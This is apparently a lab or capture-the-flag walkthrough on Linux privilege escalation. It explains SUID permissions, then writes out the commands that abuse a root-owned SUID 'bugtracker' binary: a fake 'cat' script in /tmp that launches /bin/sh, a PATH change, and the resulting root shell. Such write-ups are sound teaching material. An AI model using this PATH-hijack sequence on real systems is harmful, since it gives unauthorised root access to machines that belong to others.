the SUID (Set User ID) permission ensures that a file executes with the privileges of the file's owner, regardless of the user running it. If the file owner lacks execute permissions, an uppercase "S" is used instead of lowercase "s". if a binary is owned by root and has the SUID bit set, it will execute with root privileges, even when run by a non-root user.
victim@target:~$ sudo -l
* list the commands that a user is allowed to run with sudo privileges on a system.
victim@target:~$ id
uid=1000(robert) gid=1000(robert) groups=1000(robert),1001(bugtracker)
victim@target:~$ find / -group {groupName} 2>/dev/null
/usr/bin/bugtracker
* this will searche for files/executables that belong to the specified group
#check for the file privileges and type
victim@target:~$ ls -la /usr/bin/bugtracker && file /usr/bin/bugtracker
-rwsr-xr-- 1 root bugtracker 8792 Jan 25 2020 /usr/bin/bugtracker
/usr/bin/bugtracker: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, BuildID[sha1]=b87543421344c400a95cbbe34bbc885698b52b8d, not stripped
* the "s" in the user execute position (rws) indicates that the file has the
setuid permission set. this means that when this binary is executed, it will run
with the permissions of the file's owner (in this case, root), not the user who
ran it.
- if a non-root user runs /usr/bin/bugtracker, the program will execute as the
root user (because root is the owner of the file), giving the user elevated
privileges.
victim@target:~$ /usr/bin/bugtracker
...
victim@target:~$ touch /tmp/cat
victim@target:~$ echo "/bin/sh" > /tmp/cat
victim@target:~$ cat /tmp/cat
/bin/sh
victim@target:~$ chmod +x /tmp/cat
victim@target:~$ export PATH=/tmp:$PATH
* this will add the /tmp directory to the environment path
victim@target:~$ bugtracker
------------------
: EV Bug Tracker :
------------------
Provide Bug ID: 10
10
---------------
# whoami
root
